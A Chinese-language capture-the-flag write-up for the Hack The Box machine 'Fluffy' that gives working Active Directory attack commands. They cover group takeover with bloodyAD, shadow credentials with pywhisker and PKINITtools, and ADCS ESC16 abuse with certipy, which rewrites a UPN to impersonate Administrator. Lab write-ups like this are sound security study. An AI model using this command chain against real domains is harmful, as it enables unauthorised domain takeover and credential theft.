HTB_Fluffy

Windows(Easy)

总结

user.txt

smb_shares,pdf->CVE-2025-24071->shadow-credentials(GenericAll+GenericWrite)

GenericAll(on Group)：添加用户进组

python ~/htb/tools/bloodyAD/blo*.py --host dc01.fluffy.htb -d "fluffy.htb" --dc-ip 10.10.11.69 -u 'p.agila' -p 'pxx'set owner 'xxx''p.agila';python ~/htb/tools/bloodyAD/blo*.py --host dc01.fluffy.htb -d "fluffy.htb" --dc-ip 10.10.11.69 -u 'p.agila' -p 'pxx' add groupMember 'pxx''p.agila';

GenericWrite：Shadow Credentials

python ~/htb/tools/pywhisker/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'pxx' --target "winrm_svc" --action "add"python ~/htb/tools/PKINITtools/gettgtpkinit.py 'fluffy.htb/winrm_svc' -cert-pfx 'IW?.pfx' -pfx-pass 'L4???' winrm_svc.ccacheexport KRB5CCNAME=`pwd`/winrm_svc.ccache;python ~/htb/tools/PKINITtools/getnthash.py -key xxxxx fluffy.htb/winrm_svc

winrm_svc用bloodhound时，hashes会报错，所以用krb，形如：

sudo ntpdate fluffy.htb;sudo impacket-getTGT 'fluffy.htb/p.agila:pxx' -dc-ip 10.10.11.69;export KRB5CCNAME=`pwd`/p.agila.ccache;

root

通过winrm_svc进行bloodhound，知道可以对Administrator进行GenericAll，但是强改密码失败；但是也提供了ca_svc的用户，同样的权限，因为名字的缘故，引导转向ca相关路线，工具：certipy

certipy find -vulnerable -u [email protected] -hashes xxx -dc-ip 10.10.11.69

certipy需要5.0.2版本，我原有的4.8.2搜不到vul，即ESC16

] Got error while requesting certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA.Woul

-template 值不是ESC16，而是基于User

但是这样的话，得到的还是ca_svc.pfx

需要先修改ca_svc的upn为administrator，通过之前进组的p.agila设置

certipy account -u '[email protected]' -p 'pxx' -dc-ip 10.10.11.69 -target 'dc01.fluffy.htb'  -upn 'administrator' -user 'ca_svc' update[-] Received error: 000021C8: AtrErr: DSID-03200E96, #1:        0: 000021C8: DSID-03200E96, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 90290 (userPrincipalName)

当时这个没解决，没做了，之后又可以了。。。

certipy那块主要是发现ESC16，然后呢覆盖当前用户的upn为administrator

主要是

certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -user 'ca_svc'readCertipy v5.0.2 - by Oliver Lyak (ly4k)[*] Reading attributes for'ca_svc':...    userPrincipalName                   : administrator

否则certipy req请求的还是当前用户的pfx，没用

#覆盖upncertipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb'  -upn 'administrator' -user 'ca_svc' update #请求pfxcertipy req -u [email protected] -hashes xx -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'#当前upn变回原来的certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb'  -upn 'ca_svc' -user 'ca_svc' update #获取hashsudo ntpdate fluffy.htb;certipy auth -u administrator -domain fluffy.htb -pfx 'administrator.pfx' -dc-ip '10.10.11.69'

参考

wp:

https://4xura.com/ctf/htb/htb-writeup-fluffy/

其它

https://github.com/0x6rss/CVE-2025-24071_PoC

https://github.com/ly4k/Certipy.git

certipy只有v5.0.0及以上才支持ESC1-ESC16的

This will fetch and install the latest release. It's a good idea to periodically update, as new releases may add support for newly discovered vulnerabilities (e.g., ESC9+ techniques) or improved features. At the time of writing, Certipy v5.0.0 is the latest version (which supports ESC1 - ESC16).

或者 pip install -U certipy-ad升级即可

升级后就用certypy代替了，如果加ad还是原版本

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation